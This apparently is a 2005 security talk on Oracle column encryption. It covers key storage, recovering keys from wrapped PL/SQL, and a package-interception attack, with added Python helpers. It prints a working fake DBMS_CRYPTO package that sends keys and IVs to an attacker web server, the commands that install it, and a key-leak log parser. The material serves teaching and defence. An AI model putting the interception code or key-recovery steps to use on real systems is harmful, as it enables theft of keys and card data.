Alexander Kornbrust
28-July-2005
1. Motivation
2. Key Management
3. PL/SQL-Wrapping
4. Oracle Enterprise Manager Grid Control 10g
5. Package Interception
6. Reverse Engineering Computed Keys
7. Design Hints
8. Q/A
Reference: http://oraclesvca2.oracle.com/docs/cd/B14117_01/network.101/b10773/apdvncrp.htm (page 1140)
Customer
CID  Name        CC
1    Fonnigan    377236636051265
2    Nowman      375407276504655
3    Lotchfield  372027162158631
4    Corrudo     375876668507700
5    Foyo        375427673015113

Order
OID  CID  Quantity  Price
100  1    1         49
101  5    2         59
102  2    1         69
103  3    1         99
104  4    3         49
Customer table before encryption (CC column in clear):
1    Fonnigan    377236636051265
2    Nowman      375407276504655
3    Lotchfield  372027162158631
4    Corrudo     375876668507700
5    Foyo        375427673015113

Customer table after encryption of the CC column:
1    Fonnigan    3$1^d&2349(/234
2    Nowman      !^2wed3y*=21
3    Lotchfield  !asd99%/0kj0LK
4    Corrudo     k08aNB897634k
5    Foyo        +Wdsf54te95lm3$
declare
  plain_data_raw     raw(16);
  encrypted_data_raw raw(32);
  password           raw(16);
begin
  -- the key is a character string: convert it with utl_raw.cast_to_raw
  -- (hextoraw expects hex digits and fails with ORA-01465 on this value)
  password := utl_raw.cast_to_raw('blackhat_usa2005');
  -- DES3 input must be a multiple of 8 bytes: 15-digit card number plus one pad byte
  plain_data_raw := utl_raw.cast_to_raw('377236636051265 ');
  dbms_obfuscation_toolkit.DES3Encrypt(
    input          => plain_data_raw,
    key            => password,
    encrypted_data => encrypted_data_raw,
    which          => 0);  -- 0 = two-key 3DES for a 16-byte key; 1 (three-key) needs 24 bytes
  dbms_output.put_line(rawtohex(encrypted_data_raw));
end;
/
declare
  l_data      varchar2(32) := '377236636051265';   -- CC of customer 1
  l_key       varchar2(16) := 'blackhat_usa2005';  -- 16 bytes = AES-128 key
  l_iv        varchar2(16) := '0123456789abcdef';  -- 16-byte IV (sample value, assumed)
  -- set encryption algorithm
  l_algorithm pls_integer  := dbms_crypto.encrypt_aes128 +
                              dbms_crypto.chain_cbc + dbms_crypto.pad_pkcs5;
begin
  -- print the ciphertext as hex; casting the RAW to varchar2 gives unprintable bytes
  dbms_output.put_line('CC=' || l_data || ' Encrypted_Data=' ||
    rawtohex(dbms_crypto.encrypt(
      utl_raw.cast_to_raw(l_data),
      l_algorithm,
      utl_raw.cast_to_raw(l_key),
      utl_raw.cast_to_raw(l_iv))));
end;
/
Fixed keys
Key handled by the client
Store key in the file system
Store key in the database
Computed keys
Fixed keys
Advantages
Key is not accessible by the DBA
Disadvantages
If the key is lost/forgotten (by the user), the data is lost
Not in sync with backup/restore
Key must be shared between users
Red-Database-Security GmbH Alexander Kornbrust, 28-Jul-2005 V1.06 18
Key handled by the client
Advantages
Key is not accessible by the DBA
Disadvantages
Additional complexity (2nd listener, library, ...)
Not in sync with backup/restore
Store key in the database
Advantages
In sync with backup/restore
Disadvantages
Key is accessible by the DBA (like everything in the database)
Computed keys
Advantages
No need to store keys in the database
Every value has a different key
Disadvantages
Algorithm to generate the key must be protected
Sample algorithm (pseudocode):
  pk  := read_primary_key;
  str := xor(pk, blackhat);
  key := md5(str);
  encrypt(value, key)
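The computed-key scheme above in running form, as an added example (not code from the slides): the per-row key is md5(pk XOR constant), and whoever learns the constant recomputes every row's key without touching any key store. Assumptions of this example: the primary key is encoded as an 8-byte big-endian RAW, the shorter XOR operand is zero-padded, and the CIDs are the ones from the slide's Customer table.

```python
import hashlib
import struct

# Constant from the slide's sample algorithm; it is what the wrap utility is
# supposed to hide and what the reverse-engineering sections recover.
SECRET = b"blackhat"

# CID column of the slide's Customer table (constructed sample rows).
CUSTOMER_IDS = [1, 2, 3, 4, 5]


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """Byte-wise XOR. The shorter operand is zero-padded, so excess bytes of the
    longer one pass through unchanged (the result UTL_RAW.BIT_XOR also gives)."""
    n = max(len(a), len(b))
    return bytes(x ^ y for x, y in zip(a.ljust(n, b"\0"), b.ljust(n, b"\0")))


def computed_key(pk: int, secret: bytes = SECRET) -> bytes:
    """The slide's algorithm: key := md5(xor(pk, constant)).
    Assumption: the primary key is encoded as an 8-byte big-endian RAW.
    MD5 yields 16 bytes, which is exactly an AES-128 key."""
    pk_raw = struct.pack(">Q", pk)
    return hashlib.md5(xor_bytes(pk_raw, secret)).digest()


def key_table(secret: bytes = SECRET) -> dict:
    """Per-row keys for the whole table. Legitimate code computes this at
    encrypt/decrypt time; an attacker who has read the constant out of the
    PL/SQL source computes exactly the same table, no key store needed."""
    return {cid: computed_key(cid, secret) for cid in CUSTOMER_IDS}


def keys_are_unique(keys: dict) -> bool:
    """The 'every value has a different key' property from the slide."""
    return len(set(keys.values())) == len(keys)


if __name__ == "__main__":
    for cid, key in key_table().items():
        print(f"CID {cid}: key={key.hex()}")
    # An attacker with a wrong guess for the constant gets a useless table:
    print("guess matches:", key_table(b"guess") == key_table())
```

The security of the scheme is exactly the secrecy of SECRET: the keys are unique per row, but they are all derived from one value that sits in the package source, which is why the next section turns to wrapping that source.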
To stop the DBA (or an attacker) from reading the key, or the key-generating algorithm, out of the PL/SQL code, the PL/SQL source has to be obfuscated with the Oracle wrap utility.
Usage:
wrap iname=mypack1.pkb
Oracle is aware that wrapping PL/SQL is not safe and changed the wrapping algorithm in Oracle 10g. It is nevertheless possible to recover the source of wrapped PL/SQL.
Source of the key-building package (crypt_w10.pkb) before wrapping, with the author's annotation of what the four fragments spell:
  -- blac khat _usa 2005
  l1 varchar2(16) := chr(98)||chr(108)||chr(97)||chr(99);
  l2 varchar2(16) := chr(107)||chr(104)||chr(97)||chr(116);
  l3 varchar2(16) := chr(95)||chr(117)||chr(115)||chr(97);
  l4 varchar2(16) := chr(50)||chr(48)||chr(48)||chr(53);
  l_key VARCHAR2(16) := l1||l2||l3||l4;
Identifier and literal table as it appears in the 10g wrapped output (each identifier and literal listed once, in order of first occurrence; the chr() arguments are the key bytes):
  1PAD_PKCS5: 1L1: 116: 1CHR: 198: 1||: 1108: 197: 199:
  1L2: 1107: 1104: 1116:
  1L3: 195: 1117: 1115:
  1L4: 150: 148: 153:
  1L_KEY:
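An added example (not from the slides) that reads the identifier table shown above and lists the chr() arguments leaking from it. The token list is constructed from the slide; the "1" prefix and ":" suffix per entry, and the rule that only printable codes after a CHR reference count as key bytes, are assumptions of this parser.

```python
import re

# Constructed from the slide: the identifier table of crypt_w10.pkb as the 10g
# wrap output exposes it. Each entry is written as "1" + name-or-literal + ":".
WRAPPED_TABLE = [
    "1PAD_PKCS5:", "1L1:", "116:", "1CHR:", "198:", "1||:", "1108:", "197:", "199:",
    "1L2:", "1107:", "1104:", "1116:",
    "1L3:", "195:", "1117:", "1115:",
    "1L4:", "150:", "148:", "153:",
    "1L_KEY:",
]

VAR_RE = re.compile(r"^L\d+$")   # the key fragments l1..l4 of the slide's package


def parse_table(tokens):
    """Strip the leading '1' and trailing ':' from every entry."""
    entries = []
    for tok in tokens:
        if not (tok.startswith("1") and tok.endswith(":") and len(tok) > 2):
            raise ValueError(f"unexpected table entry {tok!r}")
        entries.append(tok[1:-1])
    return entries


def leaked_chr_literals(entries):
    """Numeric literals after the first CHR reference that decode to printable
    ASCII: the bytes the key is built from, in order of first occurrence."""
    seen_chr, chars = False, []
    for e in entries:
        if e == "CHR":
            seen_chr = True
        elif seen_chr and e.isdigit() and 32 <= int(e) < 127:
            chars.append(chr(int(e)))
    return chars


def key_fragments_by_variable(entries):
    """Group the leaked characters under the variable (L1..L4) whose assignment
    they follow. varchar2(16) leaves a '16' behind; it is below 32 and dropped."""
    groups, current = {}, None
    for e in entries:
        if VAR_RE.match(e):
            current = e
            groups[current] = ""
        elif e in ("CHR", "||"):
            continue
        elif e.isdigit():
            if current is not None and 32 <= int(e) < 127:
                groups[current] += chr(int(e))
        else:
            current = None          # another identifier (PAD_PKCS5, L_KEY): not a fragment
    return groups


if __name__ == "__main__":
    entries = parse_table(WRAPPED_TABLE)
    print("leaked characters:", "".join(leaked_chr_literals(entries)))
    for var, frag in key_fragments_by_variable(entries).items():
        print(f"{var}: {frag!r}")
```

Because the table lists each identifier and literal only once, repeats are missing: l2 and l3 both reuse 97 ('a') and l4 reuses 48 ('0'), so the parser prints blac / kht / _us / 205 rather than the full blac khat _usa 2005. The repeated positions have to be filled from the decoded package body, but the table alone already discloses every distinct byte of the key and which variable it belongs to.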
cat crypt_w10.pkb
Demonstration
[Diagram, package interception: User 1's session resolves the name DBMS_CRYPTO first against objects in its own schema (Tables, Functions, Procedures, Packages, Views), then against Public Synonyms, and only then reaches SYS. A package of the same name planted in the user's schema therefore receives the encryption key before the call reaches SYS and forwards it to www.evildba.com.]
-- Hash Functions
HASH_MD4 CONSTANT PLS_INTEGER := 1;
HASH_MD5 CONSTANT PLS_INTEGER := 2;
HASH_SH1 CONSTANT PLS_INTEGER := 3;
-- MAC Functions
HMAC_MD5 CONSTANT PLS_INTEGER := 1;
HMAC_SH1 CONSTANT PLS_INTEGER := 2;
  -- intercepting copy of DBMS_CRYPTO.ENCRYPT in the fake package body: it ships key, IV and
  -- algorithm to the attacker's web server (KEYWEBSERVER is a constant defined elsewhere in
  -- the fake package), then forwards the call to the real SYS.DBMS_CRYPTO
  FUNCTION encrypt (src IN RAW, typ IN PLS_INTEGER, key IN RAW, iv IN RAW DEFAULT NULL) RETURN RAW
  IS
    keyrc VARCHAR2(32767);
  BEGIN
    keyrc:=utl_http.request(KEYWEBSERVER||'user='||user||'/'||'/key='||UTL_RAW.cast_to_varchar2(key)||'/iv='||UTL_RAW.cast_to_varchar2(iv)||'/typ='||typ);
    RETURN SYS.dbms_crypto.encrypt(src,typ,key,iv);
  END;
SQL> @dbms_crypto_spec_fake.sql
Package created.
SQL> @dbms_crypto_fake.sql
Package Body created.
SQL> commit;
SQL> @crypt_sample.sql
tail -f http-web-access.log
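What the `tail -f http-web-access.log` step shows, as an added example (not from the slides): a parser for the GET lines the intercepting package produces, extracting user, key, IV and algorithm code per request. The log lines are constructed here in Apache common log format; the key and IV are the printable values from the slides, so `UTL_RAW.cast_to_varchar2` left them readable in the URL. The DBMS_CRYPTO constants are the ones from the package specification.

```python
import re
from typing import Optional

# Constructed sample: three lines as the attacker's web server would record
# them. Two carry leaked key material, one is an unrelated request.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Jul/2005:10:15:01 +0200] "GET /user=SCOTT//key=blackhat_usa2005/iv=0123456789abcdef/typ=4358 HTTP/1.1" 404 209
10.0.0.5 - - [28/Jul/2005:10:15:02 +0200] "GET /index.html HTTP/1.1" 200 1043
10.0.0.5 - - [28/Jul/2005:10:15:03 +0200] "GET /user=APPUSER//key=blackhat_usa2005/iv=0123456789abcdef/typ=4358 HTTP/1.1" 404 209
"""

# DBMS_CRYPTO constants; typ is the sum of cipher, chaining mode and padding.
ENCRYPT_AES128, CHAIN_CBC, PAD_PKCS5 = 6, 256, 4096
KNOWN_SUITES = {
    ENCRYPT_AES128 + CHAIN_CBC + PAD_PKCS5: "AES128/CBC/PKCS5",  # 4358, the slides' combination
}

# Path layout produced by the fake package:
#   'user=' || user || '/' || '/key=' || key || '/iv=' || iv || '/typ=' || typ
LEAK_RE = re.compile(
    r'"GET /user=(?P<user>[^/ ]+)//key=(?P<key>[^/ ]+)/iv=(?P<iv>[^/ ]*)/typ=(?P<typ>\d+) HTTP/'
)


def parse_leak(line: str) -> Optional[dict]:
    """Return the leaked parameters of one log line, or None for unrelated requests."""
    m = LEAK_RE.search(line)
    if not m:
        return None
    typ = int(m.group("typ"))
    return {
        "user": m.group("user"),
        "key": m.group("key"),
        "iv": m.group("iv"),
        "typ": typ,
        "suite": KNOWN_SUITES.get(typ, "unknown"),
    }


def extract_leaks(log_text: str) -> list:
    """All leak records in a log, in order."""
    return [leak for leak in map(parse_leak, log_text.splitlines()) if leak]


def keys_by_user(log_text: str) -> dict:
    """Distinct keys seen per database user: the same key under every user
    means one fixed key protects the whole table."""
    out = {}
    for leak in extract_leaks(log_text):
        out.setdefault(leak["user"], set()).add(leak["key"])
    return out


if __name__ == "__main__":
    for leak in extract_leaks(SAMPLE_LOG):
        print(f'{leak["user"]}: key={leak["key"]} iv={leak["iv"]} typ={leak["typ"]} ({leak["suite"]})')
```

The same pattern read from the defender's side is a detection rule: a database server making outbound HTTP requests whose path carries `key=` and `iv=` parameters is the interception in progress, and the 404 responses show the attacker does not even need a real page behind the URL.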
[Diagram: name resolution path from User 1 through Views and Public Synonyms to SYS]
All the concepts shown here also apply to other third-party software.
Some third-party encryption products for Oracle databases that merely add an extra encryption layer to the application can always be intercepted in the same way.
Demonstration
Alexander Kornbrust
Red-Database-Security GmbH
Bliesstrasse 16
D-66538 Neunkirchen
Germany
Web: http://www.red-database-security.com